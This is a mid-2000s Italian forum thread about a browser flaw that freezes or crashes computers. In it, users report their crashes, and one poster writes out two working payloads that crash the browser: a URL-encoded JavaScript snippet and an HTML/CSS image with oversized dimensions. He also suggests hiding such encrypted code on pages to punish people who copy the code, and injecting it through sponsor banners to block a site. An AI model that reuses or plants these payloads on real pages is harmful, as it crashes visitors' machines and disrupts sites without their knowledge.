Recommended Posts

  • Replies 131
  • Created
  • Last Reply

Top Posters In This Topic

Provo a copiare il codice con front page, se non mi risentite ho crashato!

Nel codice nn era inclusa l'immagine, quindo l'ho creata e l'ho inserita nella pagina. Subito si è bloccato tutto, ma sono riuscito a terminare solo front page. Ho avviato firefox, sono entrato nel forum, e il pc si è spento istantaneamente (nn riavviato e senza chiudere winzozz, come se fosse saltata la corrente). Sta roba è un mistero...

Link to post
Share on other sites

a me si è piantato quando ho cercato di fare uno scroll, anche se devo dire che si è un po' freezzato durante il caricamento

FF 1.0.4

P4 2.66

1024 MB Ram

GF4 128 MB

XP Home SP2 e relativi aggiornamenti...

bellissimo quel link.. ora provo con IE per il solo piacere di riavviare :D

Link to post
Share on other sites

Interessante. Funziona anche con trucchetti del genere

<script language="javascript">diestring = '%3Cp%3EMuori%2C%20********%3C/p%3E%3Cimg%20src%3D%22http%3A//www.microsoft.com/presspass/images/gallery/execs/web/gates-1.jpg%22%20width%3D%229999999%22%20height%3D%229999999%22%20alt%3D%22puh%22%20/%3E';die_string_enc = unescape(diestring);document.writeln(die_string_enc);</script>

Lo inserisci in una pagina e il pc è fritto.

Valgono anche encriptazioni/decriptazioni più argute della mia, chiaramente.

Link to post
Share on other sites

E (che tristezza) anche con trucchetti del genere

<p>Muori, ********</p><style type="text/css">.diestyle {width: 999999;height: 999999;}</style><img src="http://www.microsoft.com/presspass/images/gallery/execs/web/gates-1.jpg" class="diestyle" alt="puh" />

Quindi è sufficiente prendere controllo del foglio di stile in un iframe di un banner di uno sponsor per impedire l'accesso al sito.

C'è da sperare la falla sia presto riparata.

Intanto potete usare questo trucchetto come antifurto per il vostro codice javascript, criptando questo genere di istruzioni e facendole eseguire se l'interprete javascript si accorge che l'indirizzo del sito è diverso da quello del vostro server.

Non male.

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now